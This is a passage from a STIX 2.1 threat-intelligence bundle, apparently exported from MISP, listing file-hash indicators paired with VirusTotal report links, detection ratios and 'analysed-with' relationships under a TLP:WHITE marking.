"id": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:19.000Z",
|
|
"modified": "2018-09-19T05:21:19.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T10:58:17",
|
|
"category": "Other",
|
|
"uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/",
|
|
"category": "External analysis",
|
|
"uuid": "69b5bea2-6731-4815-a928-fee550c759e4"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "20/58",
|
|
"category": "Other",
|
|
"uuid": "e36c477b-83aa-479a-ab23-212692965f2e"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:23.000Z",
|
|
"modified": "2018-09-19T05:21:23.000Z",
|
|
"pattern": "[file:hashes.MD5 = '56303f9c9b3ec89f4a883a4d7b079f65' AND file:hashes.SHA1 = '4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d' AND file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:22.000Z",
|
|
"modified": "2018-09-19T05:21:22.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T05:10:00",
|
|
"category": "Other",
|
|
"uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/",
|
|
"category": "External analysis",
|
|
"uuid": "7149939a-1c5a-4b67-8ae0-edd23d9c4473"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "12/58",
|
|
"category": "Other",
|
|
"uuid": "c5156a8e-63da-4dca-af17-fe34c7991169"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:25.000Z",
|
|
"modified": "2018-09-19T05:21:25.000Z",
|
|
"pattern": "[file:hashes.MD5 = '55142f1d393c5ba7405239f232a6c059' AND file:hashes.SHA1 = 'effa37b97174802f17f3c75f25928226b7cd80ba' AND file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:24.000Z",
|
|
"modified": "2018-09-19T05:21:24.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T18:37:52",
|
|
"category": "Other",
|
|
"uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/",
|
|
"category": "External analysis",
|
|
"uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "11/58",
|
|
"category": "Other",
|
|
"uuid": "433d9d46-b96e-4c76-9134-de36185263bb"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:28.000Z",
|
|
"modified": "2018-09-19T05:21:28.000Z",
|
|
"pattern": "[file:hashes.MD5 = '601080e36cd6a757684e0996afd9a0e6' AND file:hashes.SHA1 = 'e818a9a229d93e6bfe0285c8a155dcaceb03b03d' AND file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:26.000Z",
|
|
"modified": "2018-09-19T05:21:26.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:25",
|
|
"category": "Other",
|
|
"uuid": "f49f7c54-6abf-441e-af78-252779b3999b"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/",
|
|
"category": "External analysis",
|
|
"uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "2/58",
|
|
"category": "Other",
|
|
"uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:30.000Z",
|
|
"modified": "2018-09-19T05:21:30.000Z",
|
|
"pattern": "[file:hashes.MD5 = '3a3ae909caee915af927c29a6025d16c' AND file:hashes.SHA1 = '81e7207f502229769d2d7979f88235261053c24b' AND file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:29.000Z",
|
|
"modified": "2018-09-19T05:21:29.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:19",
|
|
"category": "Other",
|
|
"uuid": "9707f2d5-8180-48c6-80e2-025cf0854494"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/",
|
|
"category": "External analysis",
|
|
"uuid": "a826a3c1-863e-4783-a3d7-6681f99f56c4"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "42/67",
|
|
"category": "Other",
|
|
"uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:33.000Z",
|
|
"modified": "2018-09-19T05:21:33.000Z",
|
|
"pattern": "[file:hashes.MD5 = '1ef7d145bf7153292ea33fe7c900ece9' AND file:hashes.SHA1 = '8f0323e577d4df82c7faa4cd6ba7303b38b6a26e' AND file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:31.000Z",
|
|
"modified": "2018-09-19T05:21:31.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:28",
|
|
"category": "Other",
|
|
"uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/",
|
|
"category": "External analysis",
|
|
"uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "38/66",
|
|
"category": "Other",
|
|
"uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"pattern": "[file:hashes.MD5 = 'a6484c6e007b1277164dd49115e5e271' AND file:hashes.SHA1 = '0308aaea4d969bc7fe4391e86b14c4908ab6adbe' AND file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:33.000Z",
|
|
"modified": "2018-09-19T05:21:33.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T12:02:50",
|
|
"category": "Other",
|
|
"uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/",
|
|
"category": "External analysis",
|
|
"uuid": "7d67a45d-37b8-4972-93be-68eb79124851"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "20/58",
|
|
"category": "Other",
|
|
"uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729",
|
|
"created": "2018-09-19T05:21:34.000Z",
|
|
"modified": "2018-09-19T05:21:34.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"target_ref": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d",
|
|
"created": "2018-09-19T05:21:34.000Z",
|
|
"modified": "2018-09-19T05:21:34.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"target_ref": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--3a5866c4-e62f-456c-822c-e656cef75d59",
|
|
"created": "2018-09-19T05:21:34.000Z",
|
|
"modified": "2018-09-19T05:21:34.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"target_ref": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"target_ref": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"target_ref": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"target_ref": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"target_ref": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"target_ref": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"target_ref": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"target_ref": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--d20dc510-00b2-4562-862d-af956e2cd62b",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"target_ref": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--2dd0a986-b772-4b30-b878-9e1e211e7482",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"target_ref": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"target_ref": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"target_ref": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a"
|
|
},
|
|
{
|
|
"type": "relationship",
|
|
"spec_version": "2.1",
|
|
"id": "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6",
|
|
"created": "2018-09-19T05:21:35.000Z",
|
|
"modified": "2018-09-19T05:21:35.000Z",
|
|
"relationship_type": "analysed-with",
|
|
"source_ref": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"target_ref": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a"
|
|
},
|
|
{
|
|
"type": "marking-definition",
|
|
"spec_version": "2.1",
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
"definition_type": "tlp",
|
|
"name": "TLP:WHITE",
|
|
"definition": {
|
|
"tlp": "white"
|
|
}
|
|
}
|
|
]
|
|
} |